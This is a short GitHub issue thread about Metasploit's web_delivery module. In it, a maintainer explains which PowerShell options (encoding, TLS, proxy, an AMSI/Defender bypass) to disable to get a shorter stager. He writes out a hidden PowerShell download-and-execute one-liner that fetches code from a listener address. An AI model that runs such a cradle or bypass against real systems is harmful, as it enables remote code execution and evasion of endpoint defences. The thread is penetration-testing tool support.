### ISSUE TITLE
how can i use short PSH payload in web_delivery

### ISSUE THREAD

**Issue by timwhitez** [rapid7/metasploit-framework#13091]
![image](https://user-images.githubusercontent.com/36320909/76921690-a3af0580-6909-11ea-9f39-6fa15b8c9355.png)

**Comment by bwatters-r7** [comment]
I am unsure of the question?  What do you mean by short payload?  In the case above, you should be able to run the provided command and connect back (or to, depending on the payload type).

We probably need a bit more info to help, here.

**Comment by timwhitez** [comment]
i want to use the stage0 payload of PSH which include the url path.

**Comment by timwr** [comment]
@timwhitez we've recently updated web_delivery to add some options that are enabled by default, you can disable them, e.g:
```
set PSH-ENCODEDCOMMAND false # this disables the base64 encoding
set PSH-FORCETLS12 false # this disables the forcing of the latest tls version
set PSH-PROXY false  # disables proxy support
set PSH-AMSIBYPASS false # disable the Windows defender bypass
```
If you disable all these options you should get the (old) psh command that I presume you're asking for, e.g: `powershell.exe -nop -w hidden -c IEX ((new-object Net.WebClient).DownloadString('http://192.168.13.37:8080/rnadom'));`

Closing this issue.
Feel free to re-open if any of these options are causing an issue. I guess there is an argument for them being off by default.
